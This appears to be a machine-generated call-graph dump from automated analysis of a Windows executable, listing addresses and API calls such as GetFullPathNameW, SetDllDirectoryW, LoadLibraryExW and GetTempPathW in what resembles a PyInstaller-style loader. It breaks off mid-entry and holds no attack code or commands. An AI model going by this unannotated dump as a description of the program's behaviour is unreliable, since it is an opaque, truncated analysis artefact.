7ff7333a6909 FileTimeToSystemTime 17095->17096 17097 7ff7333a68fc 17095->17097 17098 7ff7333a691d SystemTimeToTzSpecificLocalTime 17096->17098 17099 7ff7333a6904 17096->17099 17097->17096 17097->17099 17098->17099 17100 7ff73339bb10 _log10_special 8 API calls 17099->17100 17101 7ff7333a67f5 17100->17101 17101->17040 17103 7ff73339bb19 17102->17103 17104 7ff73339bea0 IsProcessorFeaturePresent 17103->17104 17105 7ff73339bb24 17103->17105 17106 7ff73339beb8 17104->17106 17105->17012 17105->17013 17111 7ff73339c098 RtlCaptureContext 17106->17111 17112 7ff73339c0b2 RtlLookupFunctionEntry 17111->17112 17113 7ff73339becb 17112->17113 17114 7ff73339c0c8 RtlVirtualUnwind 17112->17114 17115 7ff73339be60 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17113->17115 17114->17112 17114->17113 17117 7ff7333ab6e7 17116->17117 17120 7ff7333ab758 17117->17120 17119 7ff7333ab70e 17119->17051 17130 7ff7333ab4a0 17120->17130 17124 7ff7333ab793 17124->17119 17131 7ff7333ab4f7 17130->17131 17132 7ff7333ab4bc GetLastError 17130->17132 17131->17124 17136 7ff7333ab50c 17131->17136 17133 7ff7333ab4cc 17132->17133 17143 7ff7333ac290 17133->17143 17137 7ff7333ab540 17136->17137 17138 7ff7333ab528 GetLastError SetLastError 17136->17138 17137->17124 17139 7ff7333ab844 IsProcessorFeaturePresent 17137->17139 17138->17137 17140 7ff7333ab857 17139->17140 17160 7ff7333ab558 17140->17160 17144 7ff7333ac2af FlsGetValue 17143->17144 17145 7ff7333ac2ca FlsSetValue 17143->17145 17146 7ff7333ac2c4 17144->17146 17148 7ff7333ab4e7 SetLastError 17144->17148 17147 7ff7333ac2d7 17145->17147 17145->17148 17146->17145 17149 7ff7333afe04 _get_daylight 11 API calls 17147->17149 17148->17131 17150 7ff7333ac2e6 17149->17150 17151 7ff7333ac304 FlsSetValue 17150->17151 17152 7ff7333ac2f4 FlsSetValue 17150->17152 17154 7ff7333ac322 17151->17154 17155 7ff7333ac310 FlsSetValue 17151->17155 17153 7ff7333ac2fd 17152->17153 17156 7ff7333ab464 __free_lconv_mon 11 API calls 17153->17156 17157 7ff7333abdfc _get_daylight 11 API calls 17154->17157 17155->17153 17156->17148 17158 7ff7333ac32a 17157->17158 17159 7ff7333ab464 __free_lconv_mon 11 API calls 17158->17159 17159->17148 17161 7ff7333ab592 _isindst memcpy_s 17160->17161 17162 7ff7333ab5ba RtlCaptureContext RtlLookupFunctionEntry 17161->17162 17163 7ff7333ab5f4 RtlVirtualUnwind 17162->17163 17164 7ff7333ab62a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17162->17164 17163->17164 17165 7ff7333ab67c _isindst 17164->17165 17166 7ff73339bb10 _log10_special 8 API calls 17165->17166 17167 7ff7333ab69b GetCurrentProcess TerminateProcess 17166->17167 17169 7ff7333a8d60 17168->17169 17170 7ff7333a8dce 17168->17170 17169->17170 17172 7ff7333a8d65 17169->17172 17205 7ff7333b1a30 17170->17205 17174 7ff7333a8d9a 17172->17174 17175 7ff7333a8d7d 17172->17175 17173 7ff7333a8d92 __vcrt_freefls 17173->17061 17188 7ff7333a8b88 GetFullPathNameW 17174->17188 17180 7ff7333a8b14 GetFullPathNameW 17175->17180 17181 7ff7333a8b3a GetLastError 17180->17181 17184 7ff7333a8b50 17180->17184 17182 7ff7333a5dbc _fread_nolock 11 API calls 17181->17182 17183 7ff7333a8b47 17182->17183 17186 7ff7333a5e48 _get_daylight 11 API calls 17183->17186 17185 7ff7333a5e48 _get_daylight 11 API calls 17184->17185 17187 7ff7333a8b4c 17184->17187 17185->17187 17186->17187 17187->17173 17189 7ff7333a8bbb GetLastError 17188->17189 17192 7ff7333a8bd1 __vcrt_freefls 17188->17192 17190 7ff7333a5dbc _fread_nolock 11 API calls 17189->17190 17191 7ff7333a8bc8 17190->17191 17193 7ff7333a5e48 _get_daylight 11 API calls 17191->17193 17194 7ff7333a8bcd 17192->17194 17195 7ff7333a8c2b GetFullPathNameW 17192->17195 17193->17194 17196 7ff7333a8c60 17194->17196 17195->17189 17195->17194 17199 7ff7333a8cd4 memcpy_s 17196->17199 17201 7ff7333a8c89 memcpy_s 17196->17201 17197 7ff7333a8cbd 17198 7ff7333a5e48 _get_daylight 11 API calls 17197->17198 17200 7ff7333a8cc2 17198->17200 17199->17173 17203 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17200->17203 17201->17197 17201->17199 17202 7ff7333a8cf6 17201->17202 17202->17199 17204 7ff7333a5e48 _get_daylight 11 API calls 17202->17204 17203->17199 17204->17200 17208 7ff7333b1840 17205->17208 17209 7ff7333b1882 17208->17209 17210 7ff7333b186b 17208->17210 17212 7ff7333b1886 17209->17212 17213 7ff7333b18a7 17209->17213 17211 7ff7333a5e48 _get_daylight 11 API calls 17210->17211 17215 7ff7333b1870 17211->17215 17234 7ff7333b19ac 17212->17234 17246 7ff7333b0828 17213->17246 17219 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17215->17219 17217 7ff7333b18ac 17223 7ff7333b1951 17217->17223 17229 7ff7333b18d3 17217->17229 17233 7ff7333b187b __vcrt_freefls 17219->17233 17220 7ff7333b188f 17221 7ff7333a5e28 _fread_nolock 11 API calls 17220->17221 17222 7ff7333b1894 17221->17222 17225 7ff7333a5e48 _get_daylight 11 API calls 17222->17225 17223->17210 17226 7ff7333b1959 17223->17226 17224 7ff73339bb10 _log10_special 8 API calls 17227 7ff7333b19a1 17224->17227 17225->17215 17228 7ff7333a8b14 13 API calls 17226->17228 17227->17173 17228->17233 17230 7ff7333a8b88 14 API calls 17229->17230 17231 7ff7333b1917 17230->17231 17232 7ff7333a8c60 37 API calls 17231->17232 17231->17233 17232->17233 17233->17224 17235 7ff7333b19f6 17234->17235 17236 7ff7333b19c6 17234->17236 17238 7ff7333b1a01 GetDriveTypeW 17235->17238 17239 7ff7333b19e1 17235->17239 17237 7ff7333a5e28 _fread_nolock 11 API calls 17236->17237 17240 7ff7333b19cb 17237->17240 17238->17239 17242 7ff73339bb10 _log10_special 8 API calls 17239->17242 17241 7ff7333a5e48 _get_daylight 11 API calls 17240->17241 17243 7ff7333b19d6 17241->17243 17244 7ff7333b188b 17242->17244 17245 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17243->17245 17244->17217 17244->17220 17245->17239 17260 7ff7333bb740 17246->17260 17249 7ff7333b0875 17252 7ff73339bb10 _log10_special 8 API calls 17249->17252 17250 7ff7333b089c 17251 7ff7333afe04 _get_daylight 11 API calls 17250->17251 17253 7ff7333b08ab 17251->17253 17256 7ff7333b0909 17252->17256 17254 7ff7333b08b5 GetCurrentDirectoryW 17253->17254 17255 7ff7333b08c4 17253->17255 17254->17255 17257 7ff7333b08c9 17254->17257 17258 7ff7333a5e48 _get_daylight 11 API calls 17255->17258 17256->17217 17259 7ff7333ab464 __free_lconv_mon 11 API calls 17257->17259 17258->17257 17259->17249 17261 7ff7333b085e GetCurrentDirectoryW 17260->17261 17261->17249 17261->17250 17263 7ff7333b09a1 17262->17263 17264 7ff7333b09c5 17262->17264 17263->17264 17265 7ff7333b09a6 17263->17265 17267 7ff7333b09ff 17264->17267 17269 7ff7333b0a1e 17264->17269 17266 7ff7333a5e48 _get_daylight 11 API calls 17265->17266 17270 7ff7333b09ab 17266->17270 17268 7ff7333a5e48 _get_daylight 11 API calls 17267->17268 17271 7ff7333b0a04 17268->17271 17279 7ff7333a5e8c 17269->17279 17273 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17270->17273 17274 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17271->17274 17275 7ff7333b09b6 17273->17275 17277 7ff7333b0a0f 17274->17277 17275->17082 17276 7ff7333b0a2b 17276->17277 17278 7ff7333b174c 51 API calls 17276->17278 17277->17082 17278->17276 17280 7ff7333a5eb0 17279->17280 17286 7ff7333a5eab 17279->17286 17280->17286 17287 7ff7333ac050 GetLastError 17280->17287 17286->17276 17288 7ff7333ac091 FlsSetValue 17287->17288 17289 7ff7333ac074 FlsGetValue 17287->17289 17291 7ff7333ac0a3 17288->17291 17307 7ff7333ac081 17288->17307 17290 7ff7333ac08b 17289->17290 17289->17307 17290->17288 17293 7ff7333afe04 _get_daylight 11 API calls 17291->17293 17292 7ff7333ac0fd SetLastError 17294 7ff7333a5ecb 17292->17294 17295 7ff7333ac11d 17292->17295 17296 7ff7333ac0b2 17293->17296 17309 7ff7333aea4c 17294->17309 17317 7ff7333ab40c 17295->17317 17298 7ff7333ac0d0 FlsSetValue 17296->17298 17299 7ff7333ac0c0 FlsSetValue 17296->17299 17300 7ff7333ac0ee 17298->17300 17301 7ff7333ac0dc FlsSetValue 17298->17301 17303 7ff7333ac0c9 17299->17303 17304 7ff7333abdfc _get_daylight 11 API calls 17300->17304 17301->17303 17305 7ff7333ab464 __free_lconv_mon 11 API calls 17303->17305 17306 7ff7333ac0f6 17304->17306 17305->17307 17308 7ff7333ab464 __free_lconv_mon 11 API calls 17306->17308 17307->17292 17308->17292 17310 7ff7333aea61 17309->17310 17312 7ff7333a5eee 17309->17312 17310->17312 17361 7ff7333b4574 17310->17361 17313 7ff7333aeab8 17312->17313 17314 7ff7333aeae0 17313->17314 17315 7ff7333aeacd 17313->17315 17314->17286 17315->17314 17374 7ff7333b38c0 17315->17374 17326 7ff7333b48c0 17317->17326 17352 7ff7333b4878 17326->17352 17357 7ff7333b1548 EnterCriticalSection 17352->17357 17362 7ff7333ac050 __CxxCallCatchBlock 45 API calls 17361->17362 17363 7ff7333b4583 17362->17363 17364 7ff7333b45ce 17363->17364 17373 7ff7333b1548 EnterCriticalSection 17363->17373 17364->17312 17375 7ff7333ac050 __CxxCallCatchBlock 45 API calls 17374->17375 17376 7ff7333b38c9 17375->17376 21560 7ff7333bbfd9 21563 7ff7333a62e8 LeaveCriticalSection 21560->21563 20669 7ff7333bc06e 20670 7ff7333bc087 20669->20670 20671 7ff7333bc07d 20669->20671 20673 7ff7333b15a8 LeaveCriticalSection 20671->20673 20703 7ff7333a6280 20704 7ff7333a628b 20703->20704 20712 7ff7333b0514 20704->20712 20725 7ff7333b1548 EnterCriticalSection 20712->20725 18071 7ff73339c1fc 18092 7ff73339c3dc 18071->18092 18074 7ff73339c353 18259 7ff73339c6fc IsProcessorFeaturePresent 18074->18259 18075 7ff73339c21d __scrt_acquire_startup_lock 18077 7ff73339c35d 18075->18077 18083 7ff73339c23b __scrt_release_startup_lock 18075->18083 18078 7ff73339c6fc 7 API calls 18077->18078 18080 7ff73339c368 __CxxCallCatchBlock 18078->18080 18079 7ff73339c260 18081 7ff73339c2e6 18100 7ff7333aa6b8 18081->18100 18083->18079 18083->18081 18248 7ff7333aaa64 18083->18248 18085 7ff73339c2eb 18106 7ff733391000 18085->18106 18089 7ff73339c30f 18089->18080 18255 7ff73339c560 18089->18255 18093 7ff73339c3e4 18092->18093 18094 7ff73339c3f0 __scrt_dllmain_crt_thread_attach 18093->18094 18095 7ff73339c215 18094->18095 18096 7ff73339c3fd 18094->18096 18095->18074 18095->18075 18266 7ff7333ab30c 18096->18266 18101 7ff7333aa6c8 18100->18101 18102 7ff7333aa6dd 18100->18102 18101->18102 18103 7ff7333aa148 40 API calls 18101->18103 18102->18085 18104 7ff7333aa6e6 18103->18104 18104->18102 18105 7ff7333aa508 12 API calls 18104->18105 18105->18102 18107 7ff733392b80 18106->18107 18309 7ff7333a63c0 18107->18309 18109 7ff733392bbc 18316 7ff733392a70 18109->18316 18113 7ff73339bb10 _log10_special 8 API calls 18115 7ff7333930ec 18113->18115 18253 7ff73339c84c GetModuleHandleW 18115->18253 18116 7ff733392cdb 18492 7ff7333939d0 18116->18492 18117 7ff733392bfd 18483 7ff733391c60 18117->18483 18120 7ff733392c1c 18388 7ff733397e70 18120->18388 18123 7ff733392d2a 18515 7ff733391e50 18123->18515 18126 7ff733392c4f 18133 7ff733392c7b __vcrt_freefls 18126->18133 18487 7ff733397fe0 18126->18487 18127 7ff733392d1d 18128 7ff733392d22 18127->18128 18129 7ff733392d45 18127->18129 18511 7ff73339f5a4 18128->18511 18131 7ff733391c60 49 API calls 18129->18131 18134 7ff733392d64 18131->18134 18135 7ff733397e70 14 API calls 18133->18135 18142 7ff733392c9e __vcrt_freefls 18133->18142 18139 7ff733391930 115 API calls 18134->18139 18135->18142 18136 7ff733397f80 40 API calls 18137 7ff733392dcc 18136->18137 18138 7ff733397fe0 40 API calls 18137->18138 18140 7ff733392dd8 18138->18140 18141 7ff733392d8e 18139->18141 18143 7ff733397fe0 40 API calls 18140->18143 18141->18120 18144 7ff733392d9e 18141->18144 18142->18136 18148 7ff733392cce __vcrt_freefls 18142->18148 18145 7ff733392de4 18143->18145 18146 7ff733391e50 81 API calls 18144->18146 18147 7ff733397fe0 40 API calls 18145->18147 18154 7ff733392bc9 __vcrt_freefls 18146->18154 18147->18148 18149 7ff733397e70 14 API calls 18148->18149 18150 7ff733392e04 18149->18150 18151 7ff733392ef9 18150->18151 18152 7ff733392e29 __vcrt_freefls 18150->18152 18153 7ff733391e50 81 API calls 18151->18153 18167 7ff733392e6c 18152->18167 18401 7ff733397f80 18152->18401 18153->18154 18154->18113 18156 7ff733393033 18526 7ff7333985b0 18156->18526 18157 7ff73339303a 18159 7ff733397e70 14 API calls 18157->18159 18161 7ff73339304f __vcrt_freefls 18159->18161 18162 7ff733393187 18161->18162 18163 7ff73339308a 18161->18163 18533 7ff7333938f0 18162->18533 18164 7ff733393094 18163->18164 18165 7ff73339311a 18163->18165 18408 7ff7333985c0 18164->18408 18169 7ff733397e70 14 API calls 18165->18169 18167->18156 18167->18157 18172 7ff733393126 18169->18172 18170 7ff733393195 18173 7ff7333931b7 18170->18173 18174 7ff7333931ab 18170->18174 18176 7ff7333930a5 18172->18176 18179 7ff733393133 18172->18179 18175 7ff733391c60 49 API calls 18173->18175 18536 7ff733393a40 18174->18536 18186 7ff73339310e __vcrt_freefls 18175->18186 18182 7ff733391e50 81 API calls 18176->18182 18183 7ff733391c60 49 API calls 18179->18183 18180 7ff73339320a 18458 7ff733398950 18180->18458 18182->18154 18184 7ff733393151 18183->18184 18184->18186 18187 7ff733393158 18184->18187 18186->18180 18188 7ff7333931ed SetDllDirectoryW LoadLibraryExW 18186->18188 18190 7ff733391e50 81 API calls 18187->18190 18188->18180 18189 7ff73339321d SetDllDirectoryW 18192 7ff733393250 18189->18192 18236 7ff7333932a1 18189->18236 18190->18154 18194 7ff733397e70 14 API calls 18192->18194 18193 7ff733393433 18196 7ff73339343e 18193->18196 18202 7ff733393445 18193->18202 18201 7ff73339325c __vcrt_freefls 18194->18201 18195 7ff733393362 18463 7ff733392780 18195->18463 18198 7ff7333985b0 5 API calls 18196->18198 18199 7ff733393443 18198->18199 18199->18202 18203 7ff733393339 18201->18203 18207 7ff733393295 18201->18207 18613 7ff733392720 18202->18613 18206 7ff733397f80 40 API calls 18203->18206 18206->18236 18207->18236 18539 7ff733396200 18207->18539 18236->18193 18236->18195 18249 7ff7333aaa7b 18248->18249 18250 7ff7333aaa9c 18248->18250 18249->18081 18251 7ff7333ab358 45 API calls 18250->18251 18252 7ff7333aaaa1 18251->18252 18254 7ff73339c85d 18253->18254 18254->18089 18257 7ff73339c571 18255->18257 18256 7ff73339c326 18256->18079 18257->18256 18258 7ff73339ce18 7 API calls 18257->18258 18258->18256 18260 7ff73339c722 _isindst memcpy_s 18259->18260 18261 7ff73339c741 RtlCaptureContext RtlLookupFunctionEntry 18260->18261 18262 7ff73339c76a RtlVirtualUnwind 18261->18262 18263 7ff73339c7a6 memcpy_s 18261->18263 18262->18263 18264 7ff73339c7d8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18263->18264 18265 7ff73339c826 _isindst 18264->18265 18265->18077 18267 7ff7333b471c 18266->18267 18268 7ff73339c402 18267->18268 18276 7ff7333ad420 18267->18276 18268->18095 18270 7ff73339ce18 18268->18270 18271 7ff73339ce20 18270->18271 18272 7ff73339ce2a 18270->18272 18288 7ff73339d1b4 18271->18288 18272->18095 18287 7ff7333b1548 EnterCriticalSection 18276->18287 18289 7ff73339ce25 18288->18289 18290 7ff73339d1c3 18288->18290 18292 7ff73339d220 18289->18292 18296 7ff73339d3f0 18290->18296 18293 7ff73339d24b 18292->18293 18294 7ff73339d24f 18293->18294 18295 7ff73339d22e DeleteCriticalSection 18293->18295 18294->18272 18295->18293 18300 7ff73339d258 18296->18300 18306 7ff73339d342 TlsFree 18300->18306 18307 7ff73339d29c __vcrt_FlsAlloc 18300->18307 18301 7ff73339d2ca LoadLibraryExW 18303 7ff73339d369 18301->18303 18304 7ff73339d2eb GetLastError 18301->18304 18302 7ff73339d389 GetProcAddress 18302->18306 18303->18302 18305 7ff73339d380 FreeLibrary 18303->18305 18304->18307 18305->18302 18307->18301 18307->18302 18307->18306 18308 7ff73339d30d LoadLibraryExW 18307->18308 18308->18303 18308->18307 18310 7ff7333b06f0 18309->18310 18312 7ff7333b0796 18310->18312 18314 7ff7333b0743 18310->18314 18311 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18315 7ff7333b076c 18311->18315 18626 7ff7333b05c8 18312->18626 18314->18311 18315->18109 18634 7ff73339be10 18316->18634 18319 7ff733392ad0 18636 7ff733398840 FindFirstFileExW 18319->18636 18320 7ff733392aab GetLastError 18641 7ff733392310 18320->18641 18324 7ff733392ae3 18658 7ff7333988c0 CreateFileW 18324->18658 18325 7ff733392b3d 18671 7ff733398a00 18325->18671 18326 7ff73339bb10 _log10_special 8 API calls 18329 7ff733392b75 18326->18329 18329->18154 18338 7ff733391930 18329->18338 18331 7ff733392b4b 18333 7ff733391f30 78 API calls 18331->18333 18336 7ff733392ac6 18331->18336 18332 7ff733392af4 18661 7ff733391f30 18332->18661 18333->18336 18335 7ff733392b0c __vcrt_FlsAlloc 18335->18325 18336->18326 18339 7ff7333939d0 108 API calls 18338->18339 18340 7ff733391965 18339->18340 18341 7ff733391c23 18340->18341 18343 7ff7333973d0 83 API calls 18340->18343 18342 7ff73339bb10 _log10_special 8 API calls 18341->18342 18344 7ff733391c3e 18342->18344 18345 7ff7333919ab 18343->18345 18344->18116 18344->18117 18387 7ff7333919e3 18345->18387 19035 7ff73339fc2c 18345->19035 18347 7ff73339f5a4 74 API calls 18347->18341 18348 7ff7333919c5 18349 7ff7333919e8 18348->18349 18350 7ff7333919c9 18348->18350 19039 7ff73339f8f4 18349->19039 18352 7ff7333a5e48 _get_daylight 11 API calls 18350->18352 18353 7ff7333919ce 18352->18353 19042 7ff733392020 18353->19042 18356 7ff733391a25 18361 7ff733391a5b 18356->18361 18362 7ff733391a3c 18356->18362 18357 7ff733391a06 18358 7ff7333a5e48 _get_daylight 11 API calls 18357->18358 18359 7ff733391a0b 18358->18359 18360 7ff733392020 87 API calls 18359->18360 18360->18387 18363 7ff733391c60 49 API calls 18361->18363 18364 7ff7333a5e48 _get_daylight 11 API calls 18362->18364 18366 7ff733391a72 18363->18366 18365 7ff733391a41 18364->18365 18367 7ff733392020 87 API calls 18365->18367 18368 7ff733391c60 49 API calls 18366->18368 18367->18387 18369 7ff733391abd 18368->18369 18370 7ff73339fc2c 73 API calls 18369->18370 18371 7ff733391ae1 18370->18371 18372 7ff733391b15 18371->18372 18373 7ff733391af6 18371->18373 18374 7ff73339f8f4 _fread_nolock 53 API calls 18372->18374 18375 7ff7333a5e48 _get_daylight 11 API calls 18373->18375 18376 7ff733391b2a 18374->18376 18377 7ff733391afb 18375->18377 18378 7ff733391b4f 18376->18378 18379 7ff733391b30 18376->18379 18380 7ff733392020 87 API calls 18377->18380 19057 7ff73339f668 18378->19057 18381 7ff7333a5e48 _get_daylight 11 API calls 18379->18381 18380->18387 18383 7ff733391b35 18381->18383 18385 7ff733392020 87 API calls 18383->18385 18385->18387 18386 7ff733391e50 81 API calls 18386->18387 18387->18347 18389 7ff733397e7a 18388->18389 18390 7ff733398950 2 API calls 18389->18390 18391 7ff733397e99 GetEnvironmentVariableW 18390->18391 18392 7ff733397f02 18391->18392 18393 7ff733397eb6 ExpandEnvironmentStringsW 18391->18393 18394 7ff73339bb10 _log10_special 8 API calls 18392->18394 18393->18392 18395 7ff733397ed8 18393->18395 18396 7ff733397f14 18394->18396 18397 7ff733398a00 2 API calls 18395->18397 18396->18126 18398 7ff733397eea 18397->18398 18399 7ff73339bb10 _log10_special 8 API calls 18398->18399 18400 7ff733397efa 18399->18400 18400->18126 18402 7ff733398950 2 API calls 18401->18402 18403 7ff733397f9c 18402->18403 18404 7ff733398950 2 API calls 18403->18404 18405 7ff733397fac 18404->18405 19308 7ff7333a9174 18405->19308 18407 7ff733397fba __vcrt_freefls 18407->18167 18409 7ff7333985d5 18408->18409 19326 7ff733397bb0 GetCurrentProcess OpenProcessToken 18409->19326 18412 7ff733397bb0 7 API calls 18413 7ff733398601 18412->18413 18414 7ff733398634 18413->18414 18415 7ff73339861a 18413->18415 18417 7ff733391d50 48 API calls 18414->18417 18416 7ff733391d50 48 API calls 18415->18416 18418 7ff733398632 18416->18418 18419 7ff733398647 LocalFree LocalFree 18417->18419 18418->18419 18420 7ff733398663 18419->18420 18422 7ff73339866f 18419->18422 19336 7ff733392220 18420->19336 18423 7ff73339bb10 _log10_special 8 API calls 18422->18423 18424 7ff733393099 18423->18424 18424->18176 18425 7ff733397ca0 18424->18425 18426 7ff733397cb8 18425->18426 18427 7ff733397d3a GetTempPathW GetCurrentProcessId 18426->18427 18428 7ff733397cdc 18426->18428 19347 7ff733398760 18427->19347 18430 7ff733397e70 14 API calls 18428->18430 18432 7ff733397ce8 18430->18432 19354 7ff733397610 18432->19354 18459 7ff733398972 MultiByteToWideChar 18458->18459 18462 7ff733398996 18458->18462 18461 7ff7333989ac __vcrt_freefls 18459->18461 18459->18462 18460 7ff7333989b3 MultiByteToWideChar 18460->18461 18461->18189 18462->18460 18462->18461 18474 7ff73339278e memcpy_s 18463->18474 18464 7ff73339bb10 _log10_special 8 API calls 18465 7ff733392a24 18464->18465 18465->18154 18482 7ff733398590 LocalFree 18465->18482 18466 7ff733392987 18466->18464 18468 7ff733391c60 49 API calls 18468->18474 18469 7ff7333929a2 18471 7ff733391e50 81 API calls 18469->18471 18471->18466 18474->18466 18474->18468 18474->18469 18475 7ff733392989 18474->18475 18477 7ff733392140 81 API calls 18474->18477 18480 7ff733392990 18474->18480 19516 7ff733393970 18474->19516 19522 7ff733397260 18474->19522 19533 7ff7333915e0 18474->19533 19581 7ff733396560 18474->19581 19585 7ff7333935a0 18474->19585 19629 7ff733393860 18474->19629 18476 7ff733391e50 81 API calls 18475->18476 18476->18466 18477->18474 18481 7ff733391e50 81 API calls 18480->18481 18481->18466 18484 7ff733391c85 18483->18484 18485 7ff7333a58c4 49 API calls 18484->18485 18486 7ff733391ca8 18485->18486 18486->18120 18488 7ff733398950 2 API calls 18487->18488 18489 7ff733397ff4 18488->18489 18490 7ff7333a9174 38 API calls 18489->18490 18491 7ff733398006 __vcrt_freefls 18490->18491 18491->18133 18493 7ff7333939dc 18492->18493 18494 7ff733398950 2 API calls 18493->18494 18495 7ff733393a04 18494->18495 18496 7ff733398950 2 API calls 18495->18496 18497 7ff733393a17 18496->18497 19796 7ff7333a6f54 18497->19796 18500 7ff73339bb10 _log10_special 8 API calls 18501 7ff733392ceb 18500->18501 18501->18123 18502 7ff7333973d0 18501->18502 18503 7ff7333973f4 18502->18503 18504 7ff73339fc2c 73 API calls 18503->18504 18509 7ff7333974cb __vcrt_freefls 18503->18509 18505 7ff733397410 18504->18505 18505->18509 20187 7ff7333a8804 18505->20187 18507 7ff73339fc2c 73 API calls 18510 7ff733397425 18507->18510 18508 7ff73339f8f4 _fread_nolock 53 API calls 18508->18510 18509->18127 18510->18507 18510->18508 18510->18509 18512 7ff73339f5d4 18511->18512 20202 7ff73339f380 18512->20202 18514 7ff73339f5ed 18514->18123 18516 7ff73339be10 18515->18516 18517 7ff733391e74 GetCurrentProcessId 18516->18517 18518 7ff733391c60 49 API calls 18517->18518 18519 7ff733391ec5 18518->18519 18520 7ff7333a58c4 49 API calls 18519->18520 18521 7ff733391f02 18520->18521 18522 7ff733391cc0 80 API calls 18521->18522 18523 7ff733391f0c 18522->18523 18524 7ff73339bb10 _log10_special 8 API calls 18523->18524 18525 7ff733391f1c 18524->18525 18525->18154 18527 7ff733398510 GetConsoleWindow 18526->18527 18528 7ff733393038 18527->18528 18529 7ff73339852a GetCurrentProcessId GetWindowThreadProcessId 18527->18529 18528->18157 18529->18528 18530 7ff733398549 18529->18530 18530->18528 18531 7ff733398551 ShowWindow 18530->18531 18531->18528 18532 7ff733398560 Sleep 18531->18532 18532->18528 18532->18531 18534 7ff733391c60 49 API calls 18533->18534 18535 7ff73339390d 18534->18535 18535->18170 18537 7ff733391c60 49 API calls 18536->18537 18538 7ff733393a70 18537->18538 18538->18186 18540 7ff733396215 18539->18540 18541 7ff7333932b3 18540->18541 18542 7ff7333a5e48 _get_daylight 11 API calls 18540->18542 18545 7ff733396780 18541->18545 18543 7ff733396222 18542->18543 18544 7ff733392020 87 API calls 18543->18544 18544->18541 20213 7ff733391450 18545->20213 20319 7ff7333957a0 18613->20319 18633 7ff7333a62dc EnterCriticalSection 18626->18633 18635 7ff733392a7c GetModuleFileNameW 18634->18635 18635->18319 18635->18320 18637 7ff73339887f FindClose 18636->18637 18638 7ff733398892 18636->18638 18637->18638 18639 7ff73339bb10 _log10_special 8 API calls 18638->18639 18640 7ff733392ada 18639->18640 18640->18324 18640->18325 18642 7ff73339be10 18641->18642 18643 7ff733392330 GetCurrentProcessId 18642->18643 18676 7ff733391d50 18643->18676 18645 7ff73339237b 18680 7ff7333a5b18 18645->18680 18648 7ff733391d50 48 API calls 18649 7ff7333923eb FormatMessageW 18648->18649 18651 7ff733392424 18649->18651 18653 7ff733392436 18649->18653 18652 7ff733391d50 48 API calls 18651->18652 18652->18653 18698 7ff733391e00 18653->18698 18656 7ff73339bb10 _log10_special 8 API calls 18657 7ff733392464 18656->18657 18657->18336 18659 7ff733398900 GetFinalPathNameByHandleW CloseHandle 18658->18659 18660 7ff733392af0 18658->18660 18659->18660 18660->18332 18660->18335 18662 7ff733391f54 18661->18662 18663 7ff733391d50 48 API calls 18662->18663 18664 7ff733391fa5 18663->18664 18665 7ff7333a5b18 48 API calls 18664->18665 18666 7ff733391fe3 18665->18666 18667 7ff733391e00 78 API calls 18666->18667 18668 7ff733392001 18667->18668 18669 7ff73339bb10 _log10_special 8 API calls 18668->18669 18670 7ff733392011 18669->18670 18670->18336 18672 7ff733398a2a WideCharToMultiByte 18671->18672 18674 7ff733398a55 18671->18674 18672->18674 18675 7ff733398a6b __vcrt_freefls 18672->18675 18673 7ff733398a72 WideCharToMultiByte 18673->18675 18674->18673 18674->18675 18675->18331 18677 7ff733391d75 18676->18677 18678 7ff7333a5b18 48 API calls 18677->18678 18679 7ff733391d98 18678->18679 18679->18645 18682 7ff7333a5b72 18680->18682 18681 7ff7333a5b97 18683 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18681->18683 18682->18681 18684 7ff7333a5bd3 18682->18684 18686 7ff7333a5bc1 18683->18686 18702 7ff7333a2e08 18684->18702 18688 7ff73339bb10 _log10_special 8 API calls 18686->18688 18687 7ff7333a5cb4 18689 7ff7333ab464 __free_lconv_mon 11 API calls 18687->18689 18690 7ff7333923bb 18688->18690 18689->18686 18690->18648 18692 7ff7333a5c89 18695 7ff7333ab464 __free_lconv_mon 11 API calls 18692->18695 18693 7ff7333a5cda 18693->18687 18694 7ff7333a5ce4 18693->18694 18697 7ff7333ab464 __free_lconv_mon 11 API calls 18694->18697 18695->18686 18696 7ff7333a5c80 18696->18687 18696->18692 18697->18686 18699 7ff733391e26 18698->18699 19020 7ff7333a57a0 18699->19020 18701 7ff733391e3c 18701->18656 18703 7ff7333a2e46 18702->18703 18704 7ff7333a2e36 18702->18704 18705 7ff7333a2e4f 18703->18705 18710 7ff7333a2e7d 18703->18710 18707 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18704->18707 18708 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18705->18708 18706 7ff7333a2e75 18706->18687 18706->18692 18706->18693 18706->18696 18707->18706 18708->18706 18710->18704 18710->18706 18713 7ff7333a4450 18710->18713 18746 7ff7333a35a0 18710->18746 18783 7ff7333a2390 18710->18783 18714 7ff7333a4492 18713->18714 18715 7ff7333a4503 18713->18715 18716 7ff7333a4498 18714->18716 18717 7ff7333a452d 18714->18717 18718 7ff7333a4508 18715->18718 18719 7ff7333a455c 18715->18719 18720 7ff7333a44cc 18716->18720 18721 7ff7333a449d 18716->18721 18806 7ff7333a132c 18717->18806 18722 7ff7333a450a 18718->18722 18723 7ff7333a453d 18718->18723 18725 7ff7333a4573 18719->18725 18727 7ff7333a4566 18719->18727 18731 7ff7333a456b 18719->18731 18728 7ff7333a44a3 18720->18728 18720->18731 18721->18725 18721->18728 18726 7ff7333a44ac 18722->18726 18735 7ff7333a4519 18722->18735 18813 7ff7333a0f1c 18723->18813 18820 7ff7333a5158 18725->18820 18744 7ff7333a459c 18726->18744 18786 7ff7333a4c04 18726->18786 18727->18717 18727->18731 18728->18726 18734 7ff7333a44de 18728->18734 18742 7ff7333a44c7 18728->18742 18731->18744 18824 7ff7333a173c 18731->18824 18734->18744 18796 7ff7333a4f40 18734->18796 18735->18717 18737 7ff7333a451e 18735->18737 18737->18744 18802 7ff7333a5004 18737->18802 18738 7ff73339bb10 _log10_special 8 API calls 18739 7ff7333a4896 18738->18739 18739->18710 18742->18744 18745 7ff7333a4788 18742->18745 18831 7ff7333a5270 18742->18831 18744->18738 18745->18744 18837 